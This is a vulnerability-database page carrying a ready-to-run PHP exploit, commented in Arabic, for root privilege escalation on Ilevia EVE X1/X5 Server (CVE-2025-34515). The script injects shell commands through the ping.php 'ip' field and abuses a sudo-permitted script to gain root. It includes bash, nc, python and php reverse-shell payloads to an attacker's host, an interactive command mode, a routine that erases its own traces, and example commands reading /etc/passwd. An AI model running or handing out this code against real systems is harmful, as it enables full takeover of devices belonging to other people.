Vulners
Lucene search
📄 Ilevia EVE X1/X5 Server 4.7.18.0.eden Root Privilege Escalation
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | CVE-2025-34515 | 16 Oct 202517:54 | – | attackerkb |
| CVE-2025-34514 | 16 Oct 202517:56 | – | attackerkb |
 | CVE-2025-34514 | 16 Oct 202518:21 | – | circl |
| CVE-2025-34515 | 17 Oct 202501:34 | – | circl |
 | Ilevia EVE X1 Server 安全漏洞 | 16 Oct 202500:00 | – | cnnvd |
| Ilevia EVE X1 Server 安全漏洞 | 16 Oct 202500:00 | – | cnnvd |
 | CVE-2025-34514 | 16 Oct 202517:56 | – | cve |
| CVE-2025-34515 | 16 Oct 202517:54 | – | cve |
 | CVE-2025-34514 Ilevia EVE X1 Server 4.7.18.0.eden Authenticated Command Injection | 16 Oct 202517:56 | – | cvelist |
| CVE-2025-34515 Ilevia EVE X1 Server 4.7.18.0.eden Root Privilege Escalation | 16 Oct 202517:54 | – | cvelist |
10
=============================================================================================================================================
| # Title : Ilevia EVE X1/X5 Server 4.7.18.0.eden Root Privilege Escalation Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://www.ilevia.com |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211593/ & CVE-2025-34514
[+] Summary : A critical privilege escalation vulnerability exists in Ilevia EVE X1/X5 Server versions ≤ 4.7.18.0.eden
due to improper sudoers configuration and command injection in the web interface. The vulnerability allows the www-data web user
to execute arbitrary commands as root without authentication, leading to complete system compromise.
[+] POC : * Usage: php ilevia_exploit.php <target_url> <command>
<?php
/**
* Ilevia EVE X1/X5 Server Privilege Escalation Exploit
* CVE-2025-34515 - by indoushka
*/
class IleviaExploit {
private $target_url;
private $session;
public function __construct($target_url) {
$this->target_url = rtrim($target_url, '/');
$this->session = curl_init();
curl_setopt_array($this->session, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 30,
CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
]);
}
private function request($path, $data = [], $method = 'POST') {
$url = $this->target_url . $path;
curl_setopt($this->session, CURLOPT_URL, $url);
if ($method === 'POST') {
curl_setopt($this->session, CURLOPT_POST, true);
curl_setopt($this->session, CURLOPT_POSTFIELDS, http_build_query($data));
} else {
curl_setopt($this->session, CURLOPT_POST, false);
if (!empty($data)) {
$url .= '?' . http_build_query($data);
curl_setopt($this->session, CURLOPT_URL, $url);
}
}
$response = curl_exec($this->session);
return $response;
}
/**
* استخدام ثغرة حقن الأوامر في ping.php لكتابة أمر في السكريبت
*/
public function injectCommand($command) {
echo "[*] حقن الأمر في السكريبت...\n";
// تحويل الأمر إلى صيغة آمنة للنص
$encoded_cmd = base64_encode($command);
$payload = "echo '#!/bin/bash' > /tmp/exploit.sh && ";
$payload .= "echo 'echo \"" . addslashes($encoded_cmd) . "\" | base64 -d | bash' >> /tmp/exploit.sh && ";
$payload .= "chmod +x /tmp/exploit.sh && ";
$payload .= "echo 'id' >> /home/ilevia/www-config/http/emlite/sync_project.sh && ";
$payload .= "echo 'bash /tmp/exploit.sh' >> /home/ilevia/www-config/http/emlite/sync_project.sh";
$response = $this->request('/ajax/php/ping.php', [
'ip' => "$(bash -c \"" . addslashes($payload) . "\")"
]);
if ($response !== false && trim($response) === '0') {
echo "[+] تم حقن الأمر بنجاح\n";
return true;
}
echo "[-] فشل في حقن الأمر\n";
return false;
}
/**
* تنفيذ السكريبت المعدل باستخدام sudo
*/
public function executePrivileged() {
echo "[*] تنفيذ السكريبت بصلاحيات الجذر...\n";
$response = $this->request('/ajax/php/ping.php', [
'ip' => "$(sudo /home/ilevia/www-config/http/emlite/sync_project.sh > /tmp/result.txt 2>&1 && cat /tmp/result.txt)"
]);
if ($response !== false) {
echo "[+] تم التنفيذ بنجاح\n";
// محاولة قراءة النتيجة
$result = $this->request('/ajax/php/dbcheck.php', [
'db_log' => '/tmp/result.txt'
]);
if ($result) {
$data = json_decode($result, true);
if (isset($data['error'])) {
return $data['error'];
}
}
return $response;
}
return false;
}
/**
* تنفيذ أمر مباشر باستخدام السكريبت
*/
public function executeCommand($command) {
echo "[*] إعداد وتنفيذ الأمر: $command\n";
// إنشاء سكريبت استغلال مؤقت
$temp_script = "/tmp/cmd_" . md5(uniqid()) . ".sh";
$payload = "#!/bin/bash\n";
$payload .= "echo 'echo \\\"Executing as: \\$(id)\\\"' > $temp_script\n";
$payload .= "echo '$command' >> $temp_script\n";
$payload .= "chmod +x $temp_script\n";
$payload .= "sudo bash $temp_script > /tmp/output.txt 2>&1\n";
$payload .= "cat /tmp/output.txt";
$response = $this->request('/ajax/php/ping.php', [
'ip' => "$(bash -c \"" . addslashes($payload) . "\")"
]);
// قراءة المخرجات
$output = $this->request('/ajax/php/dbcheck.php', [
'db_log' => '/tmp/output.txt'
]);
if ($output) {
$data = json_decode($output, true);
if (isset($data['error']) && !empty(trim($data['error']))) {
return $data['error'];
}
}
return $output ?: $response;
}
/**
* استغلال مباشر للحصول على shell عكسي
*/
public function reverseShell($lhost, $lport) {
echo "[*] محاولة الحصول على shell عكسي على $lhost:$lport\n";
$payloads = [
// bash reverse shell
"bash -i >& /dev/tcp/$lhost/$lport 0>&1",
// nc reverse shell
"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc $lhost $lport >/tmp/f",
// python reverse shell
"python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"$lhost\",$lport));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'",
// php reverse shell
"php -r '\$sock=fsockopen(\"$lhost\",$lport);exec(\"/bin/bash <&3 >&3 2>&3\");'",
];
foreach ($payloads as $i => $payload) {
echo "[*] محاولة payload #" . ($i+1) . "\n";
$result = $this->executeCommand($payload);
if ($result !== false) {
echo "[+] تم إرسال payload بنجاح\n";
echo "[i] استمع على: nc -lvnp $lport\n";
return true;
}
sleep(2);
}
echo "[-] فشل جميع محاولات reverse shell\n";
return false;
}
/**
* اختبار الاتصال بالهدف
*/
public function testConnection() {
echo "[*] اختبار الاتصال بالهدف...\n";
try {
$response = $this->request('/ajax/php/ping.php', [
'ip' => '127.0.0.1'
]);
if ($response !== false && trim($response) === '0') {
echo "[+] الهدف متاح ويستجيب\n";
return true;
}
} catch (Exception $e) {
echo "[-] خطأ في الاتصال: " . $e->getMessage() . "\n";
}
return false;
}
/**
* تنظيف الآثار
*/
public function cleanup() {
echo "[*] تنظيف الآثار...\n";
$cleanup_cmd = "rm -f /tmp/exploit.sh /tmp/result.txt /tmp/output.txt /tmp/cmd_*.sh; ";
$cleanup_cmd .= "sed -i '/^id$/d' /home/ilevia/www-config/http/emlite/sync_project.sh; ";
$cleanup_cmd .= "sed -i '/^bash \\/tmp\\/exploit\\.sh$/d' /home/ilevia/www-config/http/emlite/sync_project.sh";
$this->request('/ajax/php/ping.php', [
'ip' => "$(bash -c \"" . addslashes($cleanup_cmd) . "\")"
]);
echo "[+] تم التنظيف\n";
}
public function __destruct() {
curl_close($this->session);
}
}
// واجهة سطر الأوامر
function printBanner() {
echo "=============================================\n";
echo " Ilevia EVE X1/X5 Privilege Escalation Exploit\n";
echo " CVE-2025-34515 - by indoushka \n";
echo "=============================================\n\n";
}
function printUsage() {
echo "الاستخدام:\n";
echo " php " . basename(__FILE__) . " <url> [options]\n\n";
echo "الخيارات:\n";
echo " --test اختبار الاتصال فقط\n";
echo " --cmd <command> تنفيذ أمر واحد\n";
echo " --shell <ip:port> الحصول على reverse shell\n";
echo " --interactive وضع تفاعلي\n\n";
echo "أمثلة:\n";
echo " php ilevia_exploit.php http://192.168.1.100:8080 --test\n";
echo " php ilevia_exploit.php http://target.com --cmd \"cat /etc/passwd\"\n";
echo " php ilevia_exploit.php http://target.com --shell 192.168.1.50:4444\n";
}
// التنفيذ الرئيسي
if (php_sapi_name() !== 'cli') {
die("هذا الاستغلال يعمل فقط من سطر الأوامر (CLI)\n");
}
if ($argc < 2) {
printBanner();
printUsage();
exit(1);
}
$target = $argv[1];
$exploit = new IleviaExploit($target);
printBanner();
// اختبار الاتصال أولاً
if (!$exploit->testConnection()) {
echo "[-] الهدف غير متاح\n";
exit(1);
}
// معالجة الخيارات
if ($argc >= 3) {
switch ($argv[2]) {
case '--test':
echo "[+] اختبار الاتصال ناجح\n";
exit(0);
case '--cmd':
if ($argc >= 4) {
$command = $argv[3];
echo "[*] تنفيذ الأمر: $command\n";
$result = $exploit->executeCommand($command);
if ($result !== false) {
echo "\n[+] النتيجة:\n";
echo "================================\n";
echo $result . "\n";
echo "================================\n";
} else {
echo "[-] فشل التنفيذ\n";
}
}
break;
case '--shell':
if ($argc >= 4) {
list($lhost, $lport) = explode(':', $argv[3]);
$exploit->reverseShell($lhost, $lport);
}
break;
case '--interactive':
echo "[*] الانتقال للوضع التفاعلي\n";
echo "[i] اكتب 'exit' للخروج أو 'clean' للتنظيف\n\n";
while (true) {
echo "ilevia> ";
$command = trim(fgets(STDIN));
if ($command === 'exit') {
break;
} elseif ($command === 'clean') {
$exploit->cleanup();
continue;
} elseif (empty($command)) {
continue;
}
$result = $exploit->executeCommand($command);
if ($result !== false) {
echo "\n" . $result . "\n\n";
} else {
echo "[-] فشل التنفيذ\n";
}
}
break;
default:
printUsage();
exit(1);
}
} else {
// الوضع الافتراضي: عرض خيارات sudo المتاحة
echo "[*] جلب صلاحيات sudo للمستخدم www-data...\n";
$result = $exploit->executeCommand("sudo -l");
if ($result !== false) {
echo "\n[+] صلاحيات sudo:\n";
echo "================================\n";
echo $result . "\n";
echo "================================\n";
}
echo "\n[i] للمزيد من الخيارات، استخدم --help\n";
}
// تنظيف خفيف في النهاية
$exploit->cleanup();
echo "\n[+] انتهى التنفيذ\n";
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Dec 2025 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
CVSS 49.3
EPSS0.00316
SSVC